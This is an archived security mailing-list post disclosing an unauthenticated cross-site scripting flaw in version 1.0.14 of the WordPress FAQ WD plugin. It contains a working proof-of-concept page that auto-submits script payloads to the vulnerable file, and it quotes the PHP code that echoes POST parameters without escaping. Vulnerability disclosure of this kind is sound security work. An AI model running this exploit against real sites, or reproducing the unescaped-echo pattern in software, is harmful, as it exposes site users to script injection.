Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 16 Apr 2016 14:01:20 +0530
From: shravan kumar <cor3sm4sh3r@...il.com>
To: oss-security@...ts.openwall.com
Subject: Unauthenticated XSS Vulnerability in WORDPRESS FAQ WD plugin 1.0.14.

Hello,

I would like to report a Unauthenticated XSS vulnerability in FAQ WD
 plugin version 1.0.14 .

The Plugin can be found at https://wordpress.org/plugins/faq-wd/

This Bug can be triggered by unauthenticated / Authenticated user. If a
user is sent a URL by social engineering and the user clicks the link the
bug can be triggred.

The URL should be something like this

http://attackerssite.com/XSS_POC.html



The code for XSS_POC.html is as follows:


<html>
  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="
http://targetsite/wpinstallation/wp-content/plugins/faq-wd/lang/views/SLangViewPo.php"
method="POST" >

  <input type="hidden" name="lang_err_mess" value="
<script>alert(1);</script>" />
<input type="hidden" name="lang_success_synchron" value="
<script>alert(2);</script>" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


Techinical Details:

The vulnerable page is

wp-content/plugins/faq-wd/lang/views/SLangViewPo.php

This page can be directly accessed by anyone.

The Code responsible for the vulnerability :
<?php if (isset($_POST['lang_err_mess'])): ?>
    <div class="error" style="display: inline-block;width: 100%"><p><?php
echo $_POST['lang_err_mess']; ?></p></div>
<?php elseif (isset($_POST['lang_success'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php
echo 'File was successfully updated.'; ?></p></div>
<?php endif; ?>
<?php if (isset($_POST['lang_success_synchron'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php
echo $_POST['lang_success_synchron']; ?></p></div>
<?php endif; ?>


Here we can see that there are two post request which are displayed in
unsafe manner while rendering the page.

The vulnerable POST parameters are:

   - $_POST['lang_err_mess']
   - $_POST['lang_success_synchron']


-- 
Shravan Kumar

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ